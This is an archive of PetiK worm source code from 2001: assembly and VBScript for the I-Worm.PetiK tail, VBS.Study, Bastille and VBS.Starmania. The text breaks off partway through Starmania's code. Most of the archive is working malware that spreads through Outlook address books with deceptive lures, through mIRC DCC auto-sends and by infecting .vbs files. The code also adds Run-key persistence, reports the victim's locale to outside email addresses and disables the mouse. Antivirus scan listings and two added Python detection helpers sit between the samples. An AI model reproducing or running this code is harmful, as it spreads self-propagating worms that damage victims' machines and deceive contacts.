SCRIPT: push 00h ; Creation of the file C:\script.ini
push FILE_ATTRIBUTE_NORMAL ;
push CREATE_ALWAYS ;
push 00h ;
push FILE_SHARE_READ ;
push GENERIC_WRITE ;
push offset inifile ;
call CreateFileA ;
mov [FileHandle],eax ;
push 00h ;
push offset octets ;
push INITAILLE ;
push offset inid ;
push [FileHandle] ;
call WriteFile ;
push [FileHandle] ;
call CloseHandle ;
push 00h ; This file is copied into the following directories
push offset script1 ; C:\MIRC
push offset inifile ;
call CopyFileA ;
push 00h ;
push offset script2 ; and C:\MIRC32
push offset inifile ;
call CopyFileA ;
push offset inifile ;
call DeleteFileA ;

EMAIL: push 260 ; Creation of the file EMail.vbs in the default
push offset szVBS ;
call GetWindowsDirectoryA ; WINDOWS directory as "read-only".
push offset vbsfile ;
push offset szVBS ;
call lstrcat ;
push 00h ;
push FILE_ATTRIBUTE_READONLY ;
push CREATE_ALWAYS ;
push 00h ;
push FILE_SHARE_READ ;
push GENERIC_WRITE ;
push offset szVBS ;
call CreateFileA ;
mov [FileHandle],eax ;
push 00h ;
push offset octets ;
push VBSTAILLE ;
push offset vbsd ;
push [FileHandle] ;
call WriteFile ;
push [FileHandle] ;
call CloseHandle ;

FTP: push 00h ; Creation of the file C:\Win.drv
push FILE_ATTRIBUTE_HIDDEN ; in "hidden" mode
push CREATE_ALWAYS ;
push 00h ;
push FILE_SHARE_READ ;
push GENERIC_WRITE ;
push offset drvfile ;
call CreateFileA ;
mov [FileHandle],eax ;
push 00h ;
push offset octets ;
push DRVTAILLE ;
push offset drvd ;
push [FileHandle] ;
call WriteFile ;
push [FileHandle] ;
call CloseHandle ;

EXEC: push 260 ;
push offset szBAT ;
call GetWindowsDirectoryA ;
push offset batfile ;
push offset szBAT ;
call lstrcat ;
push 00h ; Creation of the file WSOCK32.BAT in "WINDOWS"
push FILE_ATTRIBUTE_NORMAL ;
push CREATE_ALWAYS ;
push 00h ;
push FILE_SHARE_READ ;
push GENERIC_WRITE ;
push offset szBAT ;
call CreateFileA ;
mov [FileHandle],eax ;
push 00h ;
push offset octets ;
push BATTAILLE ;
push offset batd ;
push [FileHandle] ;
call WriteFile ;
push [FileHandle] ;
call CloseHandle ;
jmp CONNECT

PAUSE: push 15 * 1 * 1000 ; Wait 3 minutes,
call Sleep ; then start over.

CONNECT:push offset yahoo ; Check whether we can obtain
call gethostbyname ; the IP address of www.yahoo.fr.
test eax,eax ; YES => continue.
jz PAUSE ; NO => pause again.

BAT: push 01h ; Run the file
push offset batfile ;
call WinExec ;

ATTEND: push 30 * 1 * 1000 ; Pause for 30 seconds.
call Sleep ; Then continue.

BDR: push offset RegHandle ; Look up the "ControlPanel\Desktop" subkey
push KEY_SET_VALUE ;
push 00h ;
push offset SOUS_CLE ;
push HKEY_CURRENT_USER ;
call RegOpenKeyExA ;
push 02h ;
push offset TWP_D ;
push offset REG_SZ ;
push 00h ;
push offset TWP_S ;
push [RegHandle] ;
call RegSetValueExA ;

push 02h ;
push offset WPS_D ;
push offset REG_SZ ;
push 00h ;
push offset WPS_S ;
push [RegHandle] ;
call RegSetValueExA ;

push 00h ; Set "C:\petik.bmp" as the wallpaper
push offset bmpfile ;
push 00h ;
push SPI_SETDESKWALLPAPER ;
call SystemParametersInfoA ;

push 00h ;
call RegCloseKey ;

DOSSIER:push 260 ; Go into the WINDOWS directory.
push offset DIR ;
call GetWindowsDirectoryA ; We're there. (GetCurrentDirectoryA
push offset DIR ; or GetSystemDirectoryA could be used instead)
call SetCurrentDirectoryA ; Load it.

FFF: push offset CHERCHE ; Use the WIN32 file info
push offset FICHIER ; Take whichever extension you want (here *.txt)
call FindFirstFileA ; Search for the first file
mov edi,eax ;
cmp eax,-1 ; If none is found => -1
je FIN ; and jump to label FIN

MODIF: push 02h ; Here we change the attribute of the file we
push offset CHERCHE.FileName ; opened. We set it hidden (02h)
call SetFileAttributesA ; and read-only (01h)

FNF: push offset CHERCHE ; Search for the other files
push edi ;
call FindNextFileA ;
or eax,eax ; If none is found, jump to label FIN
jnz MODIF ; otherwise go back to label MODIF
FC: push offset SearchHandle ; Close the search session
call FindClose ;

FIN: push 00h ; END OF PROGRAM
call ExitProcess ;

signature db "I-WORM.PetiK",00h

end DEBUT
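A defender-side check, added here and not part of PetiK's archive, for the on-disk traces described in the PetiK.A header comments (a script.ini / events.ini with an on-JOIN DCC send written into the mIRC and PIRCH folders) and in the ie042601 description above (the WIN.INI [windows] run= entry and the script.ini copied into C:\MIRC and C:\MIRC32); it also accepts the one-line join handler the Bastille listing further down uses. Every sample input is constructed text and the function names are my own.

```python
"""Added example, not part of PetiK's archive: flag the on-disk artifacts the
worms above leave, in the exact formats the page shows. All inputs are
constructed sample text; nothing here touches a real mIRC/PIRCH/Windows install."""
import re

# Constructed: the script.ini PetiK.A's Mirc() routine writes (the VBS spells
# "dcc" as chr(100)&chr(99)&chr(99); the file on disk holds the plain word).
SAMPLE_MIRC_PETIK = """[script]
n0=on 1:JOIN:#:{
n1= /if ( $nick == $me ) { halt }
n2= /.dcc send $nick C:\\WINDOWS\\PetiK.txt.vbs
n3=}
"""
# Constructed, Bastille style: guard and dcc send on one line, plus an
# unrelated "on start" block that must not be mistaken for a join handler.
SAMPLE_MIRC_BASTILLE = """[script]
n0=on 1:start:{
n1= .sreq ignore
n2=}
n3=on 1:join:#:{
n4=if ($nick != $me) { dcc send $nick C:\\Bastille.com }
n5=}
"""
# Constructed benign script: greets joiners, transfers nothing.
SAMPLE_MIRC_BENIGN = """[script]
n0=on 1:JOIN:#:{
n1= /msg $nick Welcome to $chan
n2=}
"""
# Constructed: the events.ini entry PetiK.A's Pirch() routine writes.
SAMPLE_PIRCH = """[100-Level 100]
User1=*!*@*
UserCount=1
Event1=ON JOIN:#:/dcc tsend $nick C:\\WINDOWS\\PetiK.txt.vbs
EventCount=1
"""
# Constructed: WIN.INI after ie042601 registers itself on the run= line.
SAMPLE_WIN_INI = """[windows]
load=
run=C:\\WINDOWS\\SYSTEM\\ie042601.exe
NullPort=None
[Desktop]
Wallpaper=C:\\petik.bmp
"""

_MIRC_ON_JOIN = re.compile(r"^n\d+\s*=\s*on\s+\S+:join:(?P<rest>.*)$", re.I)
_PIRCH_ON_JOIN = re.compile(r"^Event\d+\s*=\s*ON\s+JOIN:(?P<rest>.*)$", re.I)
# "/.dcc send" (mIRC; the dot silences echo) or "/dcc tsend" (PIRCH) to $nick.
_DCC_SEND = re.compile(r"dcc\s+t?send\s+\$nick\s+(?P<path>\S+)", re.I)


def mirc_autosends_on_join(script_ini: str) -> list[str]:
    """Paths a mIRC script.ini DCC-sends to every user who joins a channel."""
    found, depth = [], 0  # depth: braces currently open inside an on-join block
    for raw in script_ini.splitlines():
        line = raw.strip()
        m = _MIRC_ON_JOIN.match(line)
        if m and depth == 0:
            body = m.group("rest")  # also covers one-line "on 1:join:#:/dcc send ..."
        elif depth > 0:
            body = line
        else:
            continue  # outside any join handler (e.g. the "on start" block)
        hit = _DCC_SEND.search(body)
        if hit:
            found.append(hit.group("path"))
        depth = max(0, depth + body.count("{") - body.count("}"))
    return found


def pirch_autosends_on_join(events_ini: str) -> list[str]:
    """Paths a PIRCH events.ini DCC-sends on ON JOIN (one event per line)."""
    found = []
    for raw in events_ini.splitlines():
        m = _PIRCH_ON_JOIN.match(raw.strip())
        hit = _DCC_SEND.search(m.group("rest")) if m else None
        if hit:
            found.append(hit.group("path"))
    return found


def win_ini_run_entries(win_ini: str) -> list[str]:
    """Programs on the [windows] run= / load= lines (space or comma separated)."""
    progs, section = [], ""
    for raw in win_ini.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        key, sep, value = line.partition("=")
        if section == "windows" and sep and key.strip().lower() in ("run", "load"):
            progs.extend(p for p in re.split(r"[,\s]+", value.strip()) if p)
    return progs
```

Anything returned by these three functions deserves a look: a legitimate mIRC or PIRCH script has no reason to DCC-send a file to every joiner, and on the Windows 9x systems these worms targeted the WIN.INI run= line was a common, rarely inspected autostart.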
File PetiK.exe received on 05.16.2009 19:29:07 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.8192.B
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.20
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.16 W32/Malware!456d
Avast 4.8.1335.0 2009.05.15 IRC:Generic-008
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.Malware.IMg.66DE667B
CAT-QuickHeal 10.00 2009.05.15 I-Worm.Petik
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.A
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192
eSafe 7.0.17.0 2009.05.14 Win32.WormPetik
eTrust-Vet 31.6.6508 2009.05.16 Win32/Buggy.8192
F-Prot 4.4.4.56 2009.05.16 W32/Malware!456d
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.C@mm
GData 19 2009.05.16 Generic.Malware.IMg.66DE667B
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik
K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik
McAfee 5616 2009.05.15 W32/PetTick@MM
McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.20
Microsoft 1.4602 2009.05.16 Worm:Win32/Iepatch.A@mm
NOD32 4080 2009.05.15 Win32/Petik.A
Norman 6.01.05 2009.05.16 W32/Pet_Tick.8192.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.8192
Panda 10.0.0.14 2009.05.16 W32/IEPatch
PCTools 4.4.2.0 2009.05.16 BAT.Petik.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.p
Sophos 4.41.0 2009.05.16 W32/Petik
Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.C
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.8192.B
VirusBuster 4.6.5.0 2009.05.16 BAT.Petik.A

Additional information
File size: 8192 bytes
MD5...: 61ed2fc0c60eac81856e07055621b5aa
SHA1..: f172dd91c6e866ad0dfdafd9ea8d6412cf66c42e
' Name : VBS.Study
' Author : PetiK
' Language : VBS
' Date : 15/02/2001

'VBS/Study by PetiK ©2001. 15/02/2001


'Thanks to FireBurn, Melissa, Monopoly and Prolin
'This program is used to study the propagation of worms.
'To study the propagation of worms.
' It spreads itself with 4 different Subjects, Bodies and Attached files.
' It sends the country of the infected computer to Panda34@caramail.com.

Set fso = CreateObject("Scripting.FileSystemObject")
Set ws = CreateObject("WScript.Shell")
Set O = CreateObject("Outlook.application")
Set mapi = O.GetNameSpace("MAPI")
For Each AddList In mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = O.CreateItem(0)
msg.To = AddListEntry.Address
Randomize
Num = Int((4*Rnd)+1)
Set c = fso.GetFile(WScript.ScriptFullName)

If num = 1 Then
c.Copy(fso.GetSpecialFolder(0)&"\MyGirlfriend_NUDE.jpg.vbs")
msg.Subject = "Hi, how are you ?"
msg.Body = "Hi, look at this nice Pic attached !"
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MyGirlfriend_NUDE.jpg.vbs")

elseif num = 2 Then
c.Copy(fso.GetSpecialFolder(0)&"\Winword.doc.vbs")
msg.Subject = "Important Message"
msg.Body = vbCrLf & "Here is that document you asked"
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"Winword.doc.vbs")

elseif num = 3 Then
c.Copy(fso.GetSpecialFolder(0)&"\MONOPOLY.VBS")
msg.Subject = "Bill Gates joke"
msg.Body = "Bill Gates is guitly of monopoly. Here is the proof. :-)"
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MONOPOLY.VBS")

elseif num = 4 Then
c.Copy(fso.GetSpecialFolder(0)&"\CREATIVE.exe.vbs")
msg.Subject = "A great Shockwave flash movie"
msg.Body = "Check out this new flash movie that I download just now... It's Great."
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"CREATIVE.exe.vbs")
End If
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
Set msg2 = O.CreateItem(0)
msg2.BCC = "Panda34@caramail.com; Pentasm99@aol.com"
PAYS = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
msg2.Subject = "VBS/Study arrivant de " & PAYS
msg2.Send
File Study.vbs received on 05.11.2009 07:14:06 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.11 Email-Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.11 VBS/Petik
AntiVir 7.9.0.166 2009.05.10 Worm/Petik.B1
Antiy-AVL 2.0.3.1 2009.05.08 Worm/Win32.Win32
Authentium 5.1.2.4 2009.05.10 VBS/Petik.G@mm
Avast 4.8.1335.0 2009.05.10 VBS:MailWorm-gen
AVG 8.5.0.327 2009.05.10 I-Worm/Petik
BitDefender 7.2 2009.05.11 Generic.ScriptWorm.AE9B1AEA
CAT-QuickHeal 10.00 2009.05.09 VBS/Petik.G
ClamAV 0.94.1 2009.05.11 -
Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik
DrWeb 5.0.0.12182 2009.05.11 modification of VBS.Petik
eSafe 7.0.17.0 2009.05.10 -
eTrust-Vet 31.6.6497 2009.05.08 VBS/Buggy
F-Prot 4.4.4.56 2009.05.10 VBS/Petik.G@mm
F-Secure 8.0.14470.0 2009.05.11 Email-Worm.Win32.Petik
Fortinet 3.117.0.0 2009.05.10 VBS/Petik.G@mm
GData 19 2009.05.11 Generic.ScriptWorm.AE9B1AEA
Ikarus T3.1.1.49.0 2009.05.11 Email-Worm.Win32.Petik
K7AntiVirus 7.10.729 2009.05.08 -
Kaspersky 7.0.0.125 2009.05.11 Email-Worm.Win32.Petik
McAfee 5611 2009.05.10 VBS/Generic
McAfee+Artemis 5611 2009.05.10 -
McAfee-GW-Edition 6.7.6 2009.05.11 Worm.Petik.B1
Microsoft 1.4602 2009.05.10 Virus:VBS/Petik.H
NOD32 4063 2009.05.08 probably unknown SCRIPT
Norman 6.01.05 2009.05.08 VBS/GenMail.C
nProtect 2009.1.8.0 2009.05.10 VBS.Petik.H@mm
Panda 10.0.0.14 2009.05.10 VBS/Generic.worm
PCTools 4.4.2.0 2009.05.07 VBS.Petik.H
Prevx 3.0 2009.05.11 -
Rising 21.29.00.00 2009.05.11 VBS.Worm.Spam.Brief
Sophos 4.41.0 2009.05.11 VBS/Petik-I
Sunbelt 3.2.1858.2 2009.05.09 -
Symantec 1.4.4.12 2009.05.11 Trojan Horse
TheHacker 6.3.4.1.324 2009.05.09 -
TrendMicro 8.950.0.1092 2009.05.11 VBS_GENERIC.009
VBA32 None 2009.05.11 -
ViRobot 2009.5.11.1728 2009.05.11 VBS.Worm-Family
VirusBuster 4.6.5.0 2009.05.10 VBS.Petik.H

Additional information
File size: 2033 bytes
MD5...: f41a964a3cb2ad29bcee1ce95163c7a9
SHA1..: 5b003c80a78b61e702f80e83bb77cffff4678d8b
;Bastille Virus/Worm by PetiK, 23/04/2001

.model small
.code

org 100h

DEBUT:
OUVRE_AUTO:
mov ax,3D01h
lea dx,FILE
int 21h
xchg ax,bx

xor cx,cx
mov dx,cx
mov ax,4202h
int 21h

mov cx,AUTOL
lea dx,DAUTO
mov ah,40h
int 21h

mov ah,3Eh
int 21h

COPIE_VIRUS:
mov ah,3Ch
xor cx,cx
lea dx,COPIE
int 21h
xchg ax,bx

mov ah,40h
mov cx,offset VRAIFIN - offset DEBUT
lea dx,DEBUT
int 21h

mov ah,3Eh
int 21h

MIRC: mov ah,3Ch
xor cx,cx
lea dx,MIRCF1
int 21h
xchg ax,bx

mov cx,MIRCL
lea dx,DMIRC
mov ah,40h
int 21h

mov ah,3Eh
int 21h

mov ah,41h
mov dx,offset MIRCF2
int 21h
mov ah,56h
mov dx,offset MIRCF1
mov di,offset MIRCF2
int 21h
mov ah,41h
mov dx,offset MIRCF1
int 21h
DATE: mov ah,2Bh
int 21h
mov dh,7
mov dl,14
mov cx,2001
int 21h

HEURE: mov ah,2Dh
int 21h
mov cx,0A00h
xor dx,dx
int 21h

FIN: mov ah,4Ch
int 21h

FILE db 'C:\Autoexec.bat',00h
MIRCF1 db 'C:\script.ini',00h
MIRCF2 db 'C:\mirc\script.ini',00h
COPIE db 'C:\Win32.com',00h
WHO db 'Bastille Virus/Worm by PetiK (c)2001',00h

DAUTO: db '',0dh,0ah
db '@echo off',0dh,0ah
db 'cls',0dh,0ah
db 'echo You''re infected by Bastille Virus (c)2001',0dh,0ah
db 'echo.',0dh,0ah
db 'echo Don''t panic ! It''s not dangerous, just fatal !!',0dh,0ah
db 'pause'
AUTOL equ $-DAUTO
DMIRC db '[script]',0dh,0ah
db 'n0=on 1:start:{',0dh,0ah
db 'n1= .sreq ignore',0dh,0ah
db 'n2=}',0dh,0ah
db 'n3=on 1:connect:/rename C:\Win32.com C:\Bastille.com',0dh,0ah
db 'n4=on 1:join:#:{',0dh,0ah
db 'n5=if ($nick != $me) { dcc send $nick C:\Bastille.com }',0dh,0ah
db 'n6=}',0dh,0ah
db 'n7=on 1:disconnect:/rename C:\Bastille.com C:\Win32.com'
MIRCL equ $-DMIRC

VRAIFIN:
end DEBUT
File Bastille.com received on 05.16.2009 10:45:35 (CET)

Antivirus Version Last Update Result


a-squared 4.0.0.101 2009.05.16 IRC-Worm.DOS.Petik.a!IK
AhnLab-V3 5.0.0.2 2009.05.15 Worm/Pestil
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Basti.1
Antiy-AVL 2.0.3.1 2009.05.15 Worm/DOS.Petik
Authentium 5.1.2.4 2009.05.15 IRC/Mircworm.AC
Avast 4.8.1335.0 2009.05.15 Bastille-803
AVG 8.5.0.336 2009.05.15 IRC-Worm/Pestil.A
BitDefender 7.2 2009.05.16 IRC-Worm.Bastille.A
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.15 Worm.IRC.Petik.A
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 IRC.Petik
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 MIRC/Generic
F-Prot 4.4.4.56 2009.05.15 Heuristic-1
F-Secure 8.0.14470.0 2009.05.15 IRC-Worm.DOS.Petik.a
Fortinet 3.117.0.0 2009.05.16 Petik.C
GData 19 2009.05.16 IRC-Worm.Bastille.A
Ikarus T3.1.1.49.0 2009.05.16 IRC-Worm.DOS.Petik.a
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 IRC-Worm.DOS.Petik.a
McAfee 5616 2009.05.15 IRC/Pestil
McAfee+Artemis 5616 2009.05.15 IRC/Pestil
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Basti.1
Microsoft 1.4602 2009.05.16 Worm:DOS/Pestil
NOD32 4080 2009.05.15 Petik
Norman 6.01.05 2009.05.16 DOS/Virus.gen
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 W32/Petik
PCTools 4.4.2.0 2009.05.15 Bastille.A
Prevx 3.0 2009.05.16 -
Rising 21.29.51.00 2009.05.16 DOSCOM.Virus.IRC-Worm.petik
Sophos 4.41.0 2009.05.16 Petik
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 IRC.Worm.gen
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 IRC_PETIK.C
VBA32 3.12.10.5 2009.05.16 -
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 Bastille.A

Additional information
File size: 858 bytes
MD5...: d35715e97081f71ca4df20ad03bc0341
SHA1..: 2c3b51c4a6e0fb54c3ab66446dcce7d5ed61b5de
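The scan listings in this archive are flattened to one row per engine followed by a size/MD5/SHA1 trailer. The Python below is an added example for this page, not code from PetiK's archive: it parses such a block into a structure, computes how many engines named anything, tallies family-like tokens across the inconsistent vendor names, and verifies that a file on disk is the object the listing hashes. The sample rows are copied from the Bastille.com listing above; the row pattern and the generic-token stoplist are assumptions of this example.

```python
"""Parse a flattened multi-engine scan listing and verify a sample against it.

Added example for this archive, not PetiK's code. Assumed row format (as in the
listings): <engine> <version> <YYYY.MM.DD> <result>, where <result> is "-" when
the engine reported nothing and may itself contain spaces.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

ROW_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d{4}\.\d{2}\.\d{2})\s+(.+)$")
# Assumed stoplist: tokens that carry no family information across vendors.
GENERIC = {"worm", "virus", "trojan", "generic", "malware", "script", "win32",
           "email", "mail", "heuristic"}


@dataclass
class Verdict:
    engine: str
    version: str
    updated: str
    result: Optional[str]          # None when the engine printed "-"


@dataclass
class Report:
    filename: str = ""
    verdicts: List[Verdict] = field(default_factory=list)
    size: Optional[int] = None
    md5: Optional[str] = None
    sha1: Optional[str] = None


def parse_report(text: str) -> Report:
    """Turn one 'File X received on ...' block into a Report."""
    rep = Report()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if m := re.match(r"^File (\S+) received on", line):
            rep.filename = m.group(1)
        elif m := re.match(r"^File size:\s*(\d+)", line):
            rep.size = int(m.group(1))
        elif m := re.match(r"^MD5\.*:\s*([0-9a-fA-F]{32})$", line):
            rep.md5 = m.group(1).lower()
        elif m := re.match(r"^SHA1\.*:\s*([0-9a-fA-F]{40})$", line):
            rep.sha1 = m.group(1).lower()
        elif m := ROW_RE.match(line):          # column header has no date, so it is skipped
            engine, version, updated, result = m.groups()
            result = result.strip()
            rep.verdicts.append(Verdict(engine, version, updated,
                                        None if result == "-" else result))
    return rep


def detection_rate(rep: Report) -> Tuple[int, int]:
    """(engines that named something, engines listed)."""
    return sum(1 for v in rep.verdicts if v.result is not None), len(rep.verdicts)


def family_votes(rep: Report) -> Dict[str, int]:
    """Count family-like tokens in detection names, ignoring generic words, so
    'IRC-Worm.DOS.Petik.a' and 'Worm/Pestil' can be compared across vendors."""
    votes: Dict[str, int] = {}
    for v in rep.verdicts:
        if v.result is None:
            continue
        for tok in re.split(r"[^A-Za-z0-9]+", v.result):
            tok = tok.lower()
            if len(tok) >= 4 and not tok.isdigit() and tok not in GENERIC:
                votes[tok] = votes.get(tok, 0) + 1
    return votes


def verify_sample(data: bytes, rep: Report) -> Dict[str, bool]:
    """Check that the bytes on disk are the object the listing describes."""
    checks: Dict[str, bool] = {}
    if rep.size is not None:
        checks["size"] = len(data) == rep.size
    if rep.md5:
        checks["md5"] = hashlib.md5(data).hexdigest() == rep.md5
    if rep.sha1:
        checks["sha1"] = hashlib.sha1(data).hexdigest() == rep.sha1
    return checks


# Rows copied from the Bastille.com listing above (a subset).
SAMPLE_LISTING = """File Bastille.com received on 05.16.2009 10:45:35 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 IRC-Worm.DOS.Petik.a!IK
AhnLab-V3 5.0.0.2 2009.05.15 Worm/Pestil
CAT-QuickHeal 10.00 2009.05.15 -
F-Prot 4.4.4.56 2009.05.15 Heuristic-1
Kaspersky 7.0.0.125 2009.05.16 IRC-Worm.DOS.Petik.a
Prevx 3.0 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 IRC.Worm.gen

Additional information
File size: 858 bytes
MD5...: d35715e97081f71ca4df20ad03bc0341
SHA1..: 2c3b51c4a6e0fb54c3ab66446dcce7d5ed61b5de
"""

if __name__ == "__main__":
    rep = parse_report(SAMPLE_LISTING)
    hits, total = detection_rate(rep)
    print(f"{rep.filename}: {hits}/{total} engines, votes={family_votes(rep)}")
```

The token vote is deliberately crude: it shows that "Petik" and "Pestil" are the same family seen through different vendors' naming, which a whole-string comparison would miss. Always run `verify_sample` before trusting a listing for a file you pulled from an archive; the size and hashes are the only binding between the row set and the bytes.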
' Name : VBS.Starmania.A
' Author : PetiK
' Date : May 09th 2001
' Size : 4566 bytes
' Action : It copies itself to %windir%\Hwinfo.vbs and to the Windows System folder
' as Issetup.vbs. It adds two registry values, one under the Run key and one
' under the RunServices key. Then it infects all *.vbs and *.vbe files in these
' folders (the default Windows 9x locations; the Personal folder is read from
' the Shell Folders key):
'
' C:\WINDOWS
' C:\WINDOWS\SYSTEM
' C:\WINDOWS\TEMP
' C:\WINDOWS\SAMPLES\WSH
' C:\WINDOWS\DESKTOP
' C:\MY DOCUMENTS
'
' The virus prepends its code at the start of each file.
'
' Then it creates a script.ini file in the mIRC folder (C:\mirc, C:\mirc32 or the
' same names under Program Files). When the current day is the 15th, the worm
' displays a message, changes RegisteredOwner and RegisteredOrganization to
' "Starmania" and "PetiK Corpor@tion", adds a Run value that disables the mouse
' (rundll32 mouse,disable) and sets LegalNotice values so that a message is shown
' at logon. On every run it sets the Internet Explorer start page to one of five
' addresses, chosen at random:
'
' http://www.symantec.com
' http://www.pandasoftware.com
' http://www.avp.ch
' http://www.cia.gov
' http://www.fbi.gov
'
' Finally, it spreads with Outlook. There are three different subject, body and
' attachment combinations, chosen at random for each recipient:
'
' First : Subject : New Picture for you !
' Body : Look at this nice picture attached
' Attachment : NewPic__Cool.jpg.vbs
'
' Second : Subject : LoveLetter Fix
' Body : Protect you against VBS.LoveLetter.Variant
' Attachment : LoveFix.vbs
'
' Third : Subject : How to win a holiday in Paris
' Body : Play at this game attached and win a holiday in Paris
' Attachment : Win_A_Holiday.vbs
'

#-------------------- START OF CODE --------------------#

'VBS.Starmania
'Coded by PetiK on 09/05/2001
'Made In France
On Error Resume Next
Dim f,w,file
Set f=CreateObject("Scripting.FileSystemObject")
Set w=CreateObject("WScript.Shell")
Set file=f.OpenTextFile(WScript.ScriptFullName,1)
vbsworm=file.ReadAll

START()
Sub START()
Set win=f.GetSpecialFolder(0)
Set sys=f.GetSpecialFolder(1)
Set cop=f.GetFile(WScript.ScriptFullName)
cop.Copy(win&"\Hwinfo.vbs")
cop.Copy(sys&"\Issetup.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Hwinfo")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Issetup")
w.RegWrite run,(win&"\Hwinfo.vbs")
w.RegWrite runs,(sys&"\Issetup.vbs")

MD=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders\Personal")
ptk(win)
ptk(sys)
ptk(f.GetSpecialFolder(2))
ptk(win&"\Samples\Wsh")
ptk(win&"\Desktop")
ptk(MD)

Worm ""
Mess()
Raffle()
Email()

End Sub

Function ptk(Folder)
If f.FolderExists(Folder) then
For each P in f.GetFolder(Folder).Files
ext=f.GetExtensionName(P.Name)
If ext="vbs" or ext="vbe" Then
Set VF=f.OpenTextFile(P.path, 1)
mark=VF.Read(14)
VF.Close

If mark <> "'VBS.Starmania" Then


Set VF=f.OpenTextFile(P.path, 1)
VC=VF.ReadAll
VF.Close
VCd=vbsworm & VC

Set VF=f.OpenTextFile(P.path,2,True)
VF.Write VCd
VF.Close
End If
End If
Next
End If
End Function

Function Worm(Path)
If Path = "" Then
prgfl=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If f.FileExists("C:\mirc\mirc.ini") Then Path = "C:\mirc"
If f.FileExists(prgfl & "\mirc\mirc.ini") Then Path = prgfl & "\mirc"
If f.FileExists("C:\mirc32\mirc.ini") Then Path = "C:\mirc32"
If f.FileExists(prgfl & "\mirc32\mirc.ini") Then Path = prgfl & "\mirc32"
End If
If Path <> "" Then
Set mirc=f.CreateTextFile(Path & "\script.ini", True)
mirc.WriteLine "[script]"
mirc.WriteLine "n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } "
mirc.WriteLine "n1= /dcc send $nick " & f.GetSpecialFolder(0) &"\Hwinfo.vbs"
mirc.WriteLine "n2=}"
End If
End Function

Sub Mess()
If Day(Now) = 15 Then
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StarMania","rundll32 mouse,disable"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","How are you today ? For my part, I'm fine"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","VBS.Starmania"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner","Starmania"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization","PetiK Corpor@tion"
MsgBox "Hi man, it's my new Worm/Virus. It was coded by PetiK in 2001", vbinformation, "VBS.Starmania"
End If
End Sub
Sub Raffle()
Randomize
lot=Int((5*Rnd)+1)
If lot = 1 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.symantec.com"
elseif lot = 2 Then
